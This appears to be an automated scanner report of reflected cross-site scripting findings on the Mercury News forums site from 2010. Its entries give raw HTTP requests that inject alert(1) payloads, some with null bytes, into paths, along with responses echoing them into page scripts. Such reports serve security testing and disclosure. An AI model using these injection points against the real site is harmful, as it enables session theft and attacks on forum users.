GET /forums8cac3"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb2 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:13:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22034 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... nguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums8cac3"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/forum/673 |
GET /forums/forum%00f1250"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:13:32 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb2 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:13:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21992 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... avaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/forum%00f1250"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=get ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/forum/673 |
GET /forums/forum/673%00827f3"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:13:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb2 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:14:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21992 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... cript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/forum/673%00827f3"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/jrss/forum/602/5 |
GET /forums55459"-alert(1)- Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:54:13 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:54:37 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22190 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... nguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums55459"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/jrss/forum/602/5 |
GET /forums/jrss%0035e64"-alert(1)- Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:54:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:54:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 22135 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/jrss%0035e64"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eV ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/jrss/forum/602/5 |
GET /forums/jrss/forum%0054fb5"-alert(1)- Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:54:28 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:54:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 22135 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/jrss/forum%0054fb5"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=ge ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/jrss/forum/602/5 |
GET /forums/jrss/forum/602%0031fdf"-alert(1)- Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:54:34 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:54:58 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 22135 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... "> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/jrss/forum/602%0031fdf"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/jrss/forum/602/5 |
GET /forums/jrss/forum/602/5 Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 01:22:40 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:23:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Length: 2427 Content-Type: text/html; charset=utf-8 processJsonTopics7fea7<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/jrss/forum/602/5 |
GET /forums/jrss/forum/602/5 Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 01:25:41 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:26:05 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Length: 2427 Content-Type: text/html; charset=utf-8 processJsonTopics( { 'xml' : '<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xml:base="http://forums ...[SNIP]... </rss>' } , 'forum_topics_container4134b<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/poll |
GET /forumsd7fc6"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:05 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb2 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22022 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... nguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forumsd7fc6"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=ge ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/poll |
GET /forums/poll%00cc000"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:30 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb2 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:54 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21987 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/poll%00cc000"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/syndication |
GET /forumsdae6d"-alert(1)- Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:53:42 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:54:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 22150 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... nguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forumsdae6d"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/syndication |
GET /forums/syndication%0038e10"-alert(1)- Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:54:03 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:54:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 22087 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ipt"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/syndication%0038e10"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/syndication |
GET /forums/syndication Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: forums.mercurynews.com Proxy-Connection: Keep-Alive Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:54:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 01:54:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 22087 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/syndication s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /jrss/forum/602/5 |
GET /jrssea44e"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22114 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... language="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / jrssea44e"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.camp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /jrss/forum/602/5 |
GET /jrss/forum861fb"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22114 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ge="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / jrss/forum861fb"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=g ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /jrss/forum/602/5 |
GET /jrss/forum/602abcc9"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22117 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / jrss/forum/602abcc9"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /poll |
GET /poll6ddeb"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:05:52 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22084 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... language="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / poll6ddeb"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /poll |
GET /poll?617c4"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:42 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19326 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / poll?617c4"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /poll/are-medical |
GET /poll266bd"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
